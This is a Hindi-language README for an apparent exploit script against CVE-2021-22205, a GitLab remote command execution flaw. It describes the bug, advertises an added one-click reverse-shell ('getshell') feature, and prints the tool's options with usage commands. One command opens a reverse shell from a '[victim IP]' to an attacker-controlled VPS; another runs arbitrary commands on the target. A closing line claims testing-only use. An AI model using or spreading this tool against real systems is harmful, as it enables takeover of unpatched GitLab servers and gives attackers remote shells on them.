
CVE-2021-22205 डिटेक्शन स्क्रिप्ट, getshell और कमांड निष्पादन का समर्थन करती है
चूँकि GitLab फ़ाइल पार्सर (file parser) को भेजी गई इमेज फ़ाइलों का सही ढंग से सत्यापन नहीं करता है, इसलिए कमांड निष्पादन (command execution) संभव हो जाता है। हमलावर दुर्भावनापूर्ण अनुरोध बनाकर इस भेद्यता का उपयोग करके लक्ष्य प्रणाली पर मनमाने निर्देश निष्पादित कर सकता है, जिससे अंततः GitLab सर्वर नियंत्रण में आ जाता है। चूँकि इंटरनेट पर उपलब्ध अधिकांश स्क्रिप्ट में रिवर्स शेल (reverse shell) की सुविधा नहीं होती, इसलिए ऑनलाइन उपलब्ध स्क्रिप्ट को संशोधित करके वन-क्लिक getshell सुविधा जोड़ी गई है।
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
लक्ष्य URL
-c COMMAND, --command COMMAND
कमांड निष्पादित करें
--shell क्या रिवर्स शेल (reverse shell) चाहिए या नहीं
-i IP, --ip IP रिवर्स शेल IP
-p PORT, --port PORT रिवर्स शेल पोर्ट
python3 CVE-2021-22205.py -t [पीड़ित IP] --shell -i [VPS IP] -p [VPS पोर्ट] //रिवर्स शेल प्राप्त करें
python3 CVE-2021-22205.py -t [पीड़ित IP] -c [कमांड] //कमांड निष्पादित करें
यह स्क्रिप्ट केवल परीक्षण उद्देश्यों के लिए है, कृपया इसका उपयोग किसी अन्य उद्देश्य के लिए न करें।